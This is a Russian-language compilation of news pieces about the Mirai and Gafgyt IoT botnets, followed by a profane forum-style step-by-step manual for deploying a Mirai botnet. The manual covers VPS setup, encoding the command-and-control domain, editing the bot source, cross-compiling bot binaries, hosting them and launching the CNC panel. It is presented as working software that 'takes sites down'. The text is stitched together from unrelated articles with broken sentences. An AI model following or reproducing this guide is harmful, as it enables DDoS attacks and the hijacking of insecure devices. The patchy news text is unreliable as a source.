Это троян, о котором все пишут последние несколько недель. Из самых впечатляющих достижений ботнетов созданных с помощью него - мощностью более терабита и в небольшой африканской стране.

Это же сколько компьютеров он поработил для этого?

Нисколько. Или, по крайней мере, очень мало. Целевые устройства Mirai вовсе не компьютеры, а IoT устройства - видеорегистраторы, камеры, тостеры… По статистике Level 3 Communications к концу октября под контролем трояна находилось уже около полумиллиона устройств.

И что, он прям любые камеры с холодильниками может захватить?

Не совсем. Mirai заточен под устройства, работающие на базе Busybox - упрощённого набора UNIX-утилит командной строки, который используется в качестве основного интерфейса во встраиваемых операционных системах. Троян атакует только определенные платформы, например ARM, ARM7, MIPS, PPC, SH4, SPARC и x86. В зоне риска находятся только устройства с заводскими настройками или совсем слабой защитой - инфицирование происходит с помощью брутфорс-атаки на порт Telnet, для которого используется список учётных данных администратора по умолчанию.

Как-то неэффективно получается - искать по всему интернету камеры без паролей - разве нет?

А вот и не угадали. Журналист из The Atlantic - арендовал сервер, и написал программу, которая изображает из себя тостер. Первая атака на “бытовой прибор” произошла уже спустя 40 минут! В течении последующих 11 часов “тостер” пытались взломать более чем 300 раз. Дело в том, что ботнеты достигли невиданных размеров, и пространство адресов IPv4 для них очень маленькое. Причём стоит помнить, что хакеры ищут уязвимые устройства не вручную - это делают участники ботнета. И, так как каждый новообращённый “работник” сам тоже начинает искать жертв, ботнет растёт в геометрической прогрессии.

В геометрической прогрессии? То есть через год ботнеты будут содержать триллионы устройств?!

Конечно нет 😀 Дело в том, что количество IoT устройств конечно. И это уже достаточно актуальная проблема. Автор Mirai признаётся , что максимальное число устройств в его сети было 380 тысяч, и после нескольких атак, когда пользователи и провайдеры стали предпринимать меры защиты, число устройств упало до 300 тысяч и продолжает снижаться.

После того, как исходный код Mirai был выложен в открытый доступ, все, кому не лень очень многие хакеры стали использовать его. В настоящее время количество крупных ботнетов на основе этого трояна - около 52. Стоит уточнить, что каждое устройство может принадлежать только к одной сети - сразу после захвата устройства зловред обеспечивает его защиту от повторного заражения. Единственный случай, когда устройство может перейти другому “владельцу” - это перезапуск устройства. По словам специалистов, после перезапуска устройство будет заражено снова в течение 30 секунд.

То есть эффективность Mirai снижается?

Да. Хакеры вынуждены бороться за ограниченное количество ресурсов, которое скорее сокращается (за счёт мер предосторжности), чем растёт. Ситуацию осложняет ещё то, что хакеры на редксоть эгоистичны - так, после крупной управляющий сервер (Command and Control, C&C) ботнета был просто выключен - теперь ботсеть оказалась бесполезной, да и неуязвимой к новым атакам. Каждая новая сеть на основе Mirai будет меньше предыдущих и сможет осуществлять только атаки малой мощности. К примеру, во время выборов в США были произведены слабые атаки на сайты Клинтон и Трампа. Они не нанесли никакого ущерба, и их вообще никто не заметил (кроме компании, которая специально следит за действиями этого трояна).

Понятно. А что ещё интересного известно про этот троян?

Он является наследником другого трояна, который известен под именами Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor и Torlus. Последний известен тем, что смог подчинить себе около миллиона веб-камер по оценке всё той же Level 3 Communications. Известно также, что большинство ботнетов используют не чистую копию Mirai, а свои, модифицированные версии (что весьма ожидаемо).

Ещё один интересный факт состоит в том, что пользователи рунета нашли в исходном коде Mirai русский след - в файле cnc/admin.go есть вывод комментариев на русском языке:

cnc/admin.go: this.conn.Write(byte(“\033))

С другой стороны, это выглядит скорее как шутка - “проверив счета…” явная калька (машинный перевод?) с “checking accounts”.

Два самых известных и распространенных IoT-ботнета - Mirai и Gafgyt - продолжают «размножаться». Были обнаружены новые варианты этих вредоносов, нацеленные на корпоративный сектор. Основная опасность этих киберугроз заключается в хорошо организованных и достаточно мощных DDoS-атаках.

Причина такой распространенности этих двух зловредов кроется в слитом исходном коде, который стал доступен общественности несколько лет назад. Начинающие киберпреступники сразу же начали изобретать свои злонамеренные программы на его основе.

В большинстве случае, ввиду некомпетентности злоумышленников, клоны Mirai и Gafgyt не представляли собой каких-то серьезных проектов и не несли существенных изменений в своих возможностях.

Однако последние варианты ботнетов продемонстрировали тенденцию к заражению корпоративных устройств. В отчете Unit 42, команды Palo Alto Networks , говорится, что новые образцы Mirai и Gafgyt добавили в свой арсенал ряд новых эксплойтов, которые используют старые уязвимости.

Mirai теперь атакует системы, на которых запущен непропатченный Apache Struts (именно так в прошлом году взломали ). Патч для бреши CVE-2017-5638 существует уже больше года, но, естественно, не все обновили своим установки.

Всего у Mirai на данный момент 16 эксплойтов, большинство из которых предназначены для компрометации устройств вроде маршрутизаторов, сетевых видеорегистраторов и различных камер.

Gafgyt (также известен как Baslite) также атакует бизнес-оборудование, ориентируясь на недавно обнаруженную уязвимость CVE-2018-9866. Этот критический недостаток безопасности затрагивает неподдерживаемые версии системы Global Management System (GMS) от SonicWall . Исследователи Unit 42 зафиксировали новые образцы 5 августа, то есть менее чем через неделю после публикации модуля Metasploit для этой уязвимости.

Пораженные Gafgyt устройства могут сканировать другое оборудование на наличие различного рода проблем безопасности, а также атаковать их известными эксплойтами. Еще один вид атаки, который может совершать данный вредонос - Blacknurse, представляет собой ICMP-атаку, которая сильно влияет на загрузку ЦП, что приводит к отказу в обслуживании.

Эксперты также обнаружили, что эти два новых варианта ботнетов были размещены на одном домене. Это доказывает, что за ними стоит один и тот же киберпреступник или их группа.

В конец прошлого месяца мы сообщали, что . Такие данные приводятся в отчете Global Threat Index за июль 2018 года.

А уже в этом месяце правоохранители раскрыли личность, стоящую за одним из самых известных приемников Mirai - Satori. Оказалось, что , киберпреступнику в настоящее время предъявлены обвинения.

По сути, Mirai работает просто: он сканирует интернет в поисках уязвимых для брутфорса и взлома IoT-устройств, доступных через telnet. Малварь поражает преимущественно камеры наблюдения, DVR и роутеры, а затем продолжает размножаться, подобно червю.

От DDoS-атак, осуществленных этим ботнетом недавно и крупнейший в Европе . Пиковая мощность атак достигала 620 Гбит/с и более 1 Тб/с. Чтобы добиться таких результатов злоумышленники использовали UDP-, DNS- и HTTP-флуд, а также пакеты GRE (Generic Routing Encapsulation), что эксперты признали весьма необычным.

Выводы специалистов MalwareTech в целом совпадают с этими наблюдениями. Так, за двенадцатичасовой период исследователи зафиксировали порядка 72 000 уникальных IP-адресов, и 4000 новых IP появлялись каждый час. Из этого аналитики сделали вывод, что размеры ботнета весьма скромны – всего порядка 120 000 устройств в сутки. И хотя , что ботнет гораздо крупнее и называют цифры 1-1,5 млн ботов, с этим не согласны ни исследователи MalwareTech, ни специалисты компании Akamai.

«Mirai, который практически все игнорировали ранее, в силу простоты telnet-атак, на прошлой неделе стал едва ли не главным предметом обсуждения в СМИ по всему миру, а правоохранительные органы начали расследования, при поддержке множества международных компаний», - пишут исследователи. - «Весьма вероятно, что теперь мощные DDoS-атаки станут более распространенной практикой, так как хакеры будут находить все больше и уязвимых IoT-устройств или начнут заражать устройства, защищенные NAT. Производителям определенно пора прекратить выпускать устройства с глобальными паролями по умолчанию и переключиться на выпуск устройств со случайно сгенерированными паролями, указывая их на нижней части корпуса».

В дополнение к отчету исследователи MalwareTech приложили видео, на котором показана карта заражений Mirai (см. ниже). Также на сайте исследователей можно найти интерактивную карту ботнета , которая обновляется в реальном времени.

В прошлом месяце были совершены атаки на крупные сайты вроде Twitter или Spotify, которые временно вывели их из строя. Для этого использовался ботнет Mirai , объединяющий 400-500 тысяч устройств интернета вещей. Теперь журналистам Motherboard стало известно о том, что двое хакеров сумели захватить контроль над ботнетом и создать его новую версию - она объединяет уже миллион устройств. Его мощь успели испытать на себе абоненты немецкого провайдера Deutsche Telekom , сеть которого не работала в прошлые выходные.

Охота на Mirai

Журналистам удалось поговорить с одним из двух этих таинственных хакеров - он использует никнейм BestBuy. В зашифрованном онлайн-чате он рассказал им о том, что среди взломщиков развернулась настоящая борьба за контроль над Mirai. В его софте недавно была обнаружена уязвимость. Ее использование вкупе со скоростью могли позволить BestBuy и его партнеру под ником Popopret захватить контроль над большей частью ботнета и дополнить его новыми устройствами.

Ранее наши эксперты изучили код ботнета Mirai - выяснилось, что он не был создан специально для устройств интернета вещей. Вредоносный софт ищет подключенные к сети устройства с дефолтными логинами-паролями (admin:admin, root:password и т.п.). Это значит, что теоретически, в его состав могут входить любые устройства, включая домашние компьютеры и серверы или роутеры.

IoT-устройства - обычно роутеры - входят в состав ботнета Mirai до своей перезагрузки - затем червь стирается из их памяти. Однако ботнет постоянно сканирует интернет на предмет поиска уязвимых устройств, так что «вылечившееся» устройство может быстро снова стать его частью. Среди хакеров развернулась настоящая гонка за то, чтобы первыми инфицировать как можно больше устройств.

Информации о том, как создатели нового Mirai успевают обогнать конкурентов нет. Однако они заявили журналистам, что используют собственный ботнет для сканирования потенциально уязвимых устройств, в том числе тех, что ранее тоже были частью ботнета.

«Почему бы не заставить Mirai охотиться на Mirai и поглотить оригинал», - говорит BestBuy.

Не только Mirai

Однако новый ботнет не только поглотил старые устройства из Mirai и новые с дефолтными паролями. Его создатели также используют 0-day уязвимости в прошивках IoT-устройств. Эксперты ранее прогнозировали скорое появление таких «комбинированных» ботнетов.

Борьба с ними заметно усложняется - если для противостояния Mirai самому пользователю конечного устройство достаточно лишь сменить логин и пароль для доступа к нему, то с уязвимостями гаджета он никак не сможет справиться самостоятельно.

DDoS на 700 Гбит/сек

Хакеры BestBuy и Popopret начали рекламировать свои услуги - они предлагают доступ к своей новой версии Mirai, рассылая спам-сообщения через XMPP/Jabber,

По словам хакера, они предлагают заказчиком несколько пакетов услуг. Более дешевый стоит $2 000 - за эти деньги клиенты могут арендовать от 20 000 до 25 000 узлов ботнета для запуска часовых в период до двух недель с временем перерыва между атаками в пятнадцать минут. За $15 000 или $20 000 заказчики получают возможность уже 600 000 ботов для запуска двухчасовых атак с 30 или 15-минутными перерывами. Во втором случае мощность атаки составит 700 Гбит/сек или больше.

Перспективы

Безопасность IoT-устройств часто находится на довольно низком уровне - это объясняется тем, что вендоры часто не заинтересованы во внедрении дополнительных мер информационной безопасности. Они рекламируют простоту использования своей продукции, а все дополнительные меры ИБ налагают ограничения и требуют затрат ресурсов.

Как сказано выше, защитить пользователей от более продвинутых ботнетов смогут только разработчики конечных устройств или провайдеры, предоставляющие их (в случае роутеров). Пострадавший от атаки новой версии Mirai немецкий провайдер Deutsche Telekom уже объявил о том, что «пересмотрит деловые отношения» с поставщиками уязвимых роутеров Speedport , компанией Arcadyan .

Повысить уровень защищенности интернета вещей в конечном итоге можно будет с помощью внедрения более жесткого контроля устройств со стороны провайдеров с одной стороны, и разработкой стандартов и регулирующей документации для IoT с другой. Подобные меры уже приняты во многих странах относительно обеспечения безопасности АСУ ТП. Первые шаги в этом направлении уже сделаны - например, несколько IT-вендоров в сентябре опубликовали документ под названием The Industrial Internet Security Framework (IISF) - в нем предлагается считать интернет вещей частью «промышленного интернета».

Однако, пока до окончательного решения вопроса еще далеко, и хакеры BestBuy и Popopret могут получить монополию на проведение крупных DDoS-атак в сети. Это довольно печальный факт, однако сами взломщики в ходе разговора с Motherboard заявили о том, что в своей деятельности будут руководствоваться не только прибылью, но и моральными принципами. Так BestBuy заявил, что они не будут позволять клиентам атаковать IP-адреса компаний, работающих с критической инфраструктурой.

Много пиздеть не буду, скажу лишь что софт рабочий, выключает сайты на ура. И это первый русский мануал по установке Mirai. " Историческая хуйня "

Нам понадобится два VPS KVM сервера и домен. Виртуализация именно KVM, OpenVZ мимо в этот раз.
На одном сервере будем ставить сам ботнет, на втором будем сканировать ботов. (брутить)
Сервера я брал тут - https://www.nforce.com/
Проблем не было, не банили.
Для тех кто хочет просто посмотреть, как там и что, можете взять и тут тестовые сервера - https://adminvps.ru/
ВАЖНО. Сервера должны быть на базе Debian 8, и иметь как минимум 1GB RAM.
Домен любой, без разницы.
Извините конечно, но рассказывать как прикрутить домен к VPS я не буду. Это не сложно, сами разберетесь.
Подключаемся к нашему серверу через PuTTY и начинаем.

# apt-get update -y
# apt-get upgrade -y
# apt-get install unzip gcc golang electric-fence screen sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y
При установке MySQL, нужно будет создать пароль для доступа к MySQL для root пользователя. Пароль нормальный придумаете, без всяких " qwerty "
Запишите куда нибудь, он нам еще будет нужен.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
# bash < <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)
# gvm install go1.4
# gvm use go1.4 [--default]
# gvm install go1.4 -B
# gvm use go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm use go1.5
# gvm install go1.8
# gvm use go1.8

После установки всех утилит, качаем исходники бота - и загружаем на сервер. Командой wget, или просто через программу WinSCP.
# unzip Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string vlmi.su (свой домен пишем, который прикрутили к серверу) и жмем Enter
Тут вы увидите такой текст -
XOR"ing 14 bytes of data...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - тут будет другая цифра у вас, так что не волнуйтесь, всё правильно.
Копируем весь этот текст.
Открываем через nano редактор, или же через WinSCP файл table.c который находится в папке mirai/bot
Должны увидеть это - https://prnt.sc/gcxa2m
Строка add_entry(TABLE_CNC_DOMAIN - всё что в кавычках меняем на свой текст, который только что скопировали. Вместо " 30 " пишем свою цифру, которую тоже только что скопировали. Тоже самое делаем с строкой add_entry(TABLE_SCAN_CB_DOMAIN
Сохраняем, и закрываем редактор.
Идем дальше.
Открываем редактором файл mirai/cnc/main.go
Видим это - https://prnt.sc/gcxdtz
"127.0.0.1" меняем на "127.0.0.1:3306"
"password" меняем на наш MySQL пароль который вводили ранее. "
Сохраняем файл, и закрываем редактор.
Просто копируйте всю эту фигню, рассказывать зачем это нужно, не буду -

# mkdir /etc/xcompile
# cd /etc/xcompile

# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2

# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
# mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go

# go get github.com/go-sql-driver/mysql
# go get github.com/mattn/go-shellwords
Заебался.

# cd Mirai-Source-Code-master/mirai
# ./build.sh debug telnet
# ./build.sh release telnet

# mv mirai* /var/www/html
# cd /var/www/html
# mkdir bins
# mv * bins/
# cd

Теперь MySQL.
# mysql -u root -p
Тут попросят пароль. Вводим пароль который ранее установили.
# create database mirai;
# use mirai
Теперь копируем весь текст от сюда - https://pastebin.com/QVD48J8s вставляем, и жмем Enter.
Копируем текст от сюда - https://pastebin.com/JwYSgE4v
Вместо anna-senpai пишем свой логин. Любой. Так же и с myawesomepassword. Эти данные нам нужны будут для доступа в панель управления ботом.
Должно быть вот так - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Копируем, вставляем, жмем Enter.
Теперь можно выходить.
# exit
Уже почти всё.
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# screen ./cnc
Должны увидеть надпись MySQL DB opened
Не закрываем эту сессию, открываем новую.
http://prntscr.com/gcxunx вместо vlmi.su пишем свой домен, и жмем Open.
Вводим логин и пароль, в моем случае это -
pizdec
zaebalsjapisatj
Всё, мы в панели управления ботом.